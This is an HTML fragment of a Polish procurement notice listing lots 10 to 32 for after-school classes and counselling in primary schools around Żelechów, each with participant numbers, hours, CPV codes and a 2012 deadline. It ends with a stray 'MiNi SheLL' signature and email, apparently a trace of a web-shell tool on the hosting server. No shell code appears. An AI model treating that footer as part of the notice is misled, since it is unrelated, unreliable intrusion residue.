<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
8 uczniów, 1 grupa, 8 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
8 uczniów, 1 grupa, 8 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
8 uczniów, 1 grupa, 8 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia pozalekcyjne z informatyki w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
8 uczniów, 1 grupa, 8 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych. Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
46 uczniów, 6 grup, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 360 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
6 uczniów, 1 grupa, 6 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
16 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zajęcia pozalekcyjne z matematyki w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
5 uczniów, 1 grupa, 5 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zajęcia pozalekcyjne z przyrody w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
16 uczniów, 2 grupy, 5-9 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zajęcia pozalekcyjne z przyrody w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
6 uczniów, 1 grupa, 6 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
24 uczniów, 4 grupy, 4-6 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 240 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
8 uczniów, 2 grupa, 4-6 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 120 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
11 uczniów, 3 grupy, 4-6 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 180 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zajęcia dydaktyczno-wyrównawcze z nauczania zintegrowanego w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
5 uczniów, 1 grupa, 5 osób w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
7 uczniów, 3 grupy, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 90 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
4 uczniów, 2 grupy, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Starym Goniwilku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
6 uczniów, 2 grupy, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zajęcia specjalistyczne logopedyczne w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
16 uczniów, 6 grup, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 180 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Żelechowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
27 uczniów, 9 grupa, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 270 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
5 uczniów, 2 grupy, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Starym Goniwilków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
7 uczniów, 3 grup, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć pozalekcyjnych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 90 godziny dydaktyczne (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zajęcia specjalistyczne korekcyjno-kompensacyjne w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
5 uczniów, 2 grupa, 2-3 osoby w grupie
Liczba godzin: 
Liczba godzin zajęć dydaktyczno-wyrównawczych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 60 godzin dydaktycznych (1 godzina dydaktyczna trwa 45 minut zegarowych). Harmonogram został określony w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Doradztwo i opieka pedagogiczno-psychologiczna w Szkole Podstawowej w Starym Kębłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
9 uczniów, zajęcia indywidualne
Liczba godzin: 
Liczba godzin zajęć dydaktyczno-wyrównawczych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 162 godzin dydaktycznych (2 h w miesiącu; 1 godzina dydaktyczna trwa 45 minut zegarowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Doradztwo i opieka pedagogiczno-psychologiczna w Szkole Podstawowej w Stefanowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 
14 uczniów, zajęcia indywidualne
Liczba godzin: 
Liczba godzin zajęć dydaktyczno-wyrównawczych do przeprowadzenia dla uczestników i uczestniczek projektu wynosi 252 godziny dydaktyczne (2 h w miesiącu, 1 godzina dydaktyczna trwa 45 minut zegarowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com